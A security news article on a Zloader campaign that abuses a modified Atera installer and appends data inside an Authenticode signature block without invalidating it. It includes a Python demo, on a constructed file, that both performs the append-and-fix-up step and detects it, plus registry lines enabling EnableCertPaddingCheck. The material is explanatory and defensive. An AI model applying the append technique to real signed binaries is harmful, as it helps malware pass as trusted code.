Microsoft's code signature verification is easily bypassed by Zloader malware
According to security research firm Check Point, a threat group known as MalSmoke launched a Zloader malware campaign in November 2021. The campaign is still active and growing in scale.
Notably, the malware is able to bypass Microsoft's code signature verification. It then deploys its malicious payload; to date the campaign has stolen personal information from thousands of victims in 111 countries.
Zloader (also known as Terdot or DELoader) is a banking trojan first seen in 2015. It steals account credentials and other private data from infected systems.
More recently, Zloader has also been used to deliver other malware families, including the Ryuk and Egregor ransomware.
Abuse of Atera remote management software
In the most recent campaign, the infection starts with a file named Java.msi, which is a modified Atera installer.
Atera is legitimate remote monitoring and management (RMM) software widely used by IT departments, so the installer raises no antivirus warnings even though it has been modified.
It is not yet clear how the attackers trick victims into downloading the malicious file; the most likely vectors are pirated (cracked) software and phishing emails.
Once run, the installer gives the attackers remote access to the system, from which they can execute scripts and upload or download files.
Microsoft's code signature verification has been bypassed
The remarkable thing about this campaign is that it defeats Microsoft's code signature verification (Authenticode). Check Point confirmed that appContast.dll, the file that installs Zloader and modifies the registry, carries a valid code signature, so Windows trusts it and lets it run normally.
Comparing the modified DLL with the original Atera DLL, the researchers found only minor changes: the PE checksum and the size of the signature block. Neither of those fields is covered by the Authenticode hash (which skips the CheckSum field, the security data-directory entry and the certificate table itself), so the changes do not invalidate the signature, yet they are enough to let the attackers append their own data to the signature section of the file.
Microsoft has known about this weakness since 2012; it is tracked as CVE-2012-0151, CVE-2013-3900 and CVE-2020-1599. Microsoft has published a stricter signature verification policy, but it is opt-in and, for application compatibility reasons, remains disabled by default.
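To make the bypass concrete, the following Python script (an example added to this article, not code from Check Point, Atera or Microsoft) builds a constructed minimal PE file with a stand-in signature block, hashes it the way Authenticode does, appends data inside the signature block while fixing up the signature size and checksum as the malware did, and shows that the Authenticode hash is unchanged while a parser that measures the real length of the PKCS#7 structure still finds the appended bytes. Everything here is constructed for the demo: the PE layout produced by build_sample_pe, the DER blob FAKE_SIGNATURE that stands in for a real PKCS#7 SignedData structure, and the PAYLOAD string; the hash routine is simplified to files whose certificate table sits at the end.

```python
"""Why data appended inside an Authenticode signature block survives signature
verification, and how to detect it. Example added to this article; not code from
Check Point, Atera or Microsoft. The PE file, the DER blob standing in for a real
PKCS#7 SignedData structure, and the payload are all constructed for the demo."""
import hashlib
import struct

SECURITY_DIR = 4  # IMAGE_DIRECTORY_ENTRY_SECURITY
# Constructed stand-in for a PKCS#7 signature: a DER SEQUENCE holding one OCTET STRING.
FAKE_SIGNATURE = b"\x30\x0e\x04\x0c" + b"fake PKCS#7!"
PAYLOAD = b"appended script"  # constructed; the real campaign appended its own data here

def pe_layout(pe):
    """Offsets of the three regions Authenticode leaves out of its hash."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt = e_lfanew + 24                          # past 'PE\0\0' and the 20-byte COFF header
    magic = struct.unpack_from("<H", pe, opt)[0]
    dd = {0x10B: 96, 0x20B: 112}[magic]          # data-directory offset for PE32 / PE32+
    sec_dir = opt + dd + 8 * SECURITY_DIR
    cert_off, cert_size = struct.unpack_from("<II", pe, sec_dir)
    return {"checksum": opt + 64, "sec_dir": sec_dir,
            "cert_off": cert_off, "cert_size": cert_size}

def authenticode_hash(pe):
    """SHA-256 as Authenticode hashes a PE: skip CheckSum, the security directory
    entry and the certificate table. Simplified: assumes the table ends the file."""
    lay = pe_layout(pe)
    end = lay["cert_off"] if lay["cert_size"] else len(pe)
    h = hashlib.sha256()
    h.update(pe[:lay["checksum"]])
    h.update(pe[lay["checksum"] + 4:lay["sec_dir"]])
    h.update(pe[lay["sec_dir"] + 8:end])
    return h.hexdigest()

def pe_checksum(pe):
    """PE CheckSum as ImageHlp computes it; the CheckSum dword itself is skipped."""
    skip = pe_layout(pe)["checksum"]
    padded = pe + b"\0" * (-len(pe) % 4)
    total = sum(struct.unpack_from("<I", padded, i)[0]
                for i in range(0, len(padded), 4) if i != skip)
    while total >> 16:                           # end-around-carry fold to 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (total + len(pe)) & 0xFFFFFFFF

def der_size(blob):
    """Encoded size (tag + length + content) of the DER element at blob[0]."""
    first = blob[1]
    if first < 0x80:
        return 2 + first
    n = first & 0x7F
    return 2 + n + int.from_bytes(blob[2:2 + n], "big")

def appended_data(pe):
    """Bytes inside WIN_CERTIFICATE past the end of the PKCS#7 DER structure, ignoring
    up to 7 zero bytes of alignment padding: what EnableCertPaddingCheck rejects."""
    lay = pe_layout(pe)
    if lay["cert_size"] == 0:
        return b""                               # unsigned file
    off = lay["cert_off"]
    dw_length = struct.unpack_from("<I", pe, off)[0]
    body = pe[off + 8:off + dw_length]           # bCertificate
    extra = body[der_size(body):]
    return b"" if len(extra) < 8 and not extra.strip(b"\0") else extra

def append_to_certificate_table(pe, payload):
    """The modification the article describes: grow the signature block with arbitrary
    data, then fix up dwLength, the directory Size and CheckSum, none of which is hashed."""
    lay = pe_layout(pe)
    off, size = lay["cert_off"], lay["cert_size"]
    new_size = (size + len(payload) + 7) & ~7
    out = bytearray(pe[:off + size] + payload + b"\0" * (new_size - size - len(payload)))
    struct.pack_into("<I", out, off, new_size)                 # WIN_CERTIFICATE.dwLength
    struct.pack_into("<I", out, lay["sec_dir"] + 4, new_size)  # security directory Size
    struct.pack_into("<I", out, lay["checksum"], pe_checksum(bytes(out)))
    return bytes(out)

def build_sample_pe(signature):
    """Constructed minimal PE32+: headers only, certificate table at the end."""
    hdr = bytearray(b"MZ" + b"\0" * 62)
    struct.pack_into("<I", hdr, 0x3C, 0x40)                    # e_lfanew
    hdr += b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, 240, 0x22)
    opt = bytearray(240)                                       # PE32+ optional header
    struct.pack_into("<H", opt, 0, 0x20B)
    struct.pack_into("<I", opt, 108, 16)                       # NumberOfRvaAndSizes
    cert_off = (len(hdr) + len(opt) + 7) & ~7
    dw_length = (8 + len(signature) + 7) & ~7
    struct.pack_into("<II", opt, 112 + 8 * SECURITY_DIR, cert_off, dw_length)
    pe = hdr + opt + b"\0" * (cert_off - len(hdr) - len(opt))
    pe += struct.pack("<IHH", dw_length, 0x0200, 0x0002)       # WIN_CERTIFICATE header
    pe += signature + b"\0" * (dw_length - 8 - len(signature))
    struct.pack_into("<I", pe, pe_layout(pe)["checksum"], pe_checksum(bytes(pe)))
    return bytes(pe)

if __name__ == "__main__":
    clean = build_sample_pe(FAKE_SIGNATURE)
    bad = append_to_certificate_table(clean, PAYLOAD)
    print("authenticode hash, clean:", authenticode_hash(clean))
    print("authenticode hash, modified:", authenticode_hash(bad))
    print("appended data found:", appended_data(bad))
```

Running the script prints the same Authenticode digest for both files and then the appended bytes found in the modified one. On a real signed binary the same appended_data check can be pointed at the file on disk: a non-empty result means the file would fail verification with the stricter policy turned on, and is worth a closer look even where it is not.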
You can enable the stricter Microsoft policy with a .reg file (administrator rights are required):
- Open Notepad
- Paste the following lines into it (the Wow6432Node key is needed on 64-bit Windows so that 32-bit processes honour the setting as well):

    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Wintrust\Config]
    "EnableCertPaddingCheck"="1"

    [HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Cryptography\Wintrust\Config]
    "EnableCertPaddingCheck"="1"

- Save the file with a .reg extension
- Double-click the saved file to import it into the registry
Once the check is on, any file whose signature block contains data beyond the PKCS#7 structure is treated as unsigned. That includes a small number of legitimate installers that store data in that space, which is why Microsoft left the check opt-in; test it on your own software before rolling it out widely.
As of January 2, 2022, the latest Zloader campaign had hit 2,170 different systems.